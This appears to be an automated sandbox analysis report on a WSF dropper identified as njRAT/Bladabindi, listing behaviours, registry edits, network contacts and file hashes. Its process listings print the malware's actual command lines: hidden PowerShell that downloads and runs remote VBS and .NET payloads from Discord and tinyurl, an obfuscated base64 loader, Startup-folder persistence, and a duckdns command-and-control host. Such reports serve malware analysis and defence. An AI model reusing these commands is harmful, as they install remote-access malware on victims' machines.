Analysis Overview
SHA256
31482a83f3cbb75af81d1fb11e190343dc635d69e767da83d0bb55eabe0244f0
Threat Level: Known bad
The file c5d249498462540b2e9d9280343f3292 was found to be: Known bad.
Malicious Activity Summary
njRAT/Bladabindi
Blocklisted process makes network request
Drops startup file
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies Internet Explorer settings
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-10-06 22:00
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-10-06 22:00
Reported
2022-10-06 22:03
Platform
win7-20220901-en
Max time kernel
106s
Max time network
51s
Command Line
Signatures
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f44471a0359723fa74489c55595fe6b30ee0000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 200000001a00eebbfe2300001000d09ad3fd8f23af46adb46c85480369c700000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1340 wrote to memory of 1680 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1340 wrote to memory of 1680 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1340 wrote to memory of 1680 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1680 wrote to memory of 688 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\explorer.exe |
| PID 1680 wrote to memory of 688 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\explorer.exe |
| PID 1680 wrote to memory of 688 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\explorer.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c5d249498462540b2e9d9280343f3292.wsf"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden wget 'https://cdn.discordapp.com/attachments/1026576632913342517/1027643430551158908/8.vbs' -o C:\Windows\Temp\nLeNPdi.vbs;explorer.exe C:\Windows\Temp\nLeNPdi.vbs;Start-Sleep 3;[System.IO.File]::Copy('ÛŒÛŒá€Ø§.wsf','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ÛŒÛŒá€Ø§.wsf');Start-Sleep 1;rm *.pif,*.uue
C:\Windows\explorer.exe
"C:\Windows\explorer.exe" C:\Windows\Temp\nLeNPdi.vbs
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Network
Files
memory/1340-54-0x000007FEFB741000-0x000007FEFB743000-memory.dmp
memory/1680-55-0x0000000000000000-mapping.dmp
memory/1680-57-0x000007FEF3D60000-0x000007FEF4783000-memory.dmp
memory/1680-59-0x0000000001FB4000-0x0000000001FB7000-memory.dmp
memory/1680-58-0x000007FEF3200000-0x000007FEF3D5D000-memory.dmp
memory/688-60-0x0000000000000000-mapping.dmp
memory/1524-63-0x0000000003A00000-0x0000000003A10000-memory.dmp
memory/1680-64-0x0000000001FBB000-0x0000000001FDA000-memory.dmp
memory/1680-65-0x0000000001FB4000-0x0000000001FB7000-memory.dmp
memory/1680-66-0x0000000001FBB000-0x0000000001FDA000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-10-06 22:00
Reported
2022-10-06 22:03
Platform
win10v2004-20220812-en
Max time kernel
142s
Max time network
141s
Command Line
Signatures
njRAT/Bladabindi
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ییခا.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ییခا.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2468 set thread context of 3716 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c5d249498462540b2e9d9280343f3292.wsf"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden wget 'https://cdn.discordapp.com/attachments/1026576632913342517/1027643430551158908/8.vbs' -o C:\Windows\Temp\nLeNPdi.vbs;explorer.exe C:\Windows\Temp\nLeNPdi.vbs;Start-Sleep 3;[System.IO.File]::Copy('ÛŒÛŒá€Ø§.wsf','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ÛŒÛŒá€Ø§.wsf');Start-Sleep 1;rm *.pif,*.uue
C:\Windows\explorer.exe
"C:\Windows\explorer.exe" C:\Windows\Temp\nLeNPdi.vbs
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\Temp\nLeNPdi.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwCsAK8A+gDwAOQAugDXAOQAJwA7AFsAQgB5AHQAZQBbAF0AXQAgACQARABMAEwAIAA9ACAAWwBzAHkAcwB0AG⌚⌚⌚AbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHQAaQBuAHkAdQByAGwALgBjAG8AbQAvADIAZQByAHAAaAA2AGMAcwAnACkAKQA7AFsAcwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAH⌚⌚⌚AcgByAG⌚⌚⌚AbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQARABMAEwAKQAuAEcAZQB0AFQAeQBwAG⌚⌚⌚AKAAnAE4AdwBnAG8AeABNAC4ASwBQAEoAYQBOAGoAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFAAVQBsAEcASwBBACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH⌚⌚⌚AbABsACwAIABbAG8AYgBqAG⌚⌚⌚AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AMAAwADAAOAB0AGMAbwAzADAALwA2ADEANgAzADIANAAxADAAOQA5ADEANAA2ADcANQA2ADIAMAAxAC8AMgAzADQANgA2ADAAMQA5ADQAOAA3ADYANQA3AD⌚⌚⌚ANgAyADAAMQAvAHMAdABuAG⌚⌚⌚AbQBoAGMAYQB0AHQAYQAvAG0AbwBjAC4AcABwAGEAZAByAG8AYwBzAGkAZAAuAG4AZABjAC8ALwA6AHMAcAB0AHQAaAAnACAALAAgACQA⌚⌚⌚gBvAGQAYQBDAG8AcAB5ACAALAAgACcAzAbMBgEQJwYnACAAKQApAA==';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );$OWjuxD = $OWjuxD.replace('¬¯úðäº×ä', 'C:\Windows\Temp\nLeNPdi.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Windows\Temp\nLeNPdi.vbs';[Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://tinyurl.com/2erph6cs'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('NwgoxM.KPJaNj').GetMethod('PUlGKA').Invoke($null, [object[]] ('txt.0008tco30/6163241099146756201/2346601948765756201/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $RodaCopy , 'ییခا' ))"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | tinyurl.com | udp |
| US | 104.20.138.65:443 | tinyurl.com | tcp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | wins0310ok.duckdns.org | udp |
| US | 23.237.25.131:8000 | wins0310ok.duckdns.org | tcp |
| FR | 40.79.141.153:443 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| US | 93.184.220.29:80 | tcp |
Files
memory/4356-132-0x0000000000000000-mapping.dmp
memory/4356-133-0x00000191410F0000-0x0000019141112000-memory.dmp
memory/4356-134-0x00007FF883C40000-0x00007FF884701000-memory.dmp
memory/1964-135-0x0000000000000000-mapping.dmp
C:\Windows\Temp\nLeNPdi.vbs
| MD5 | 51f4179655580184434c7a30d3cb842f |
| SHA1 | cc0d4c9fae0e3ef4e951dd43db00e3cfb3403b60 |
| SHA256 | 233f64beec6c3cb039a1d0f2298bd169643db6a59bbf9abc9d05b26a3b985290 |
| SHA512 | 5e3cd952d81be643840bcaa42c1a86af4ad9dc74706a6fb154b14d4bf8bc790277f1c5107c3e6ca9f385890152b2a79cd331eb62a43f6ce801e2d14bfbd8e764 |
memory/1316-137-0x0000000000000000-mapping.dmp
memory/4444-138-0x0000000000000000-mapping.dmp
memory/2468-139-0x0000000000000000-mapping.dmp
memory/4444-140-0x00007FF883C40000-0x00007FF884701000-memory.dmp
memory/2468-141-0x00007FF883C40000-0x00007FF884701000-memory.dmp
memory/3716-142-0x0000000000400000-0x000000000040C000-memory.dmp
memory/3716-143-0x000000000040677E-mapping.dmp
memory/2468-144-0x00007FF883C40000-0x00007FF884701000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 50a8221b93fbd2628ac460dd408a9fc1 |
| SHA1 | 7e99fe16a9b14079b6f0316c37cc473e1f83a7e6 |
| SHA256 | 46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e |
| SHA512 | 27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | f41839a3fe2888c8b3050197bc9a0a05 |
| SHA1 | 0798941aaf7a53a11ea9ed589752890aee069729 |
| SHA256 | 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a |
| SHA512 | 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699 |
memory/4444-147-0x00007FF883C40000-0x00007FF884701000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d65d5729810e777c618132ea705c1f14 |
| SHA1 | c0df1e6c8a70b39b8db337f84e7e9398bc9f6a9e |
| SHA256 | 51262a3776b88451b2843a41f185425c1626b1f749f8c10cc8ef243985bef27e |
| SHA512 | 8cab4719c12091d99f72c4307619fb7ab31854e81cc3c23304bf650698cb2d0cd00ca03f1e1b2065606dc4f5e28ad272bbc2acdc3383a6eba39d75777e9059f7 |
memory/3716-149-0x00000000054B0000-0x000000000554C000-memory.dmp
memory/4356-150-0x00007FF883C40000-0x00007FF884701000-memory.dmp
memory/3716-151-0x0000000005B30000-0x00000000060D4000-memory.dmp
memory/3716-152-0x0000000005730000-0x00000000057C2000-memory.dmp
memory/3716-153-0x0000000005690000-0x000000000569A000-memory.dmp
memory/3716-154-0x00000000058C0000-0x0000000005926000-memory.dmp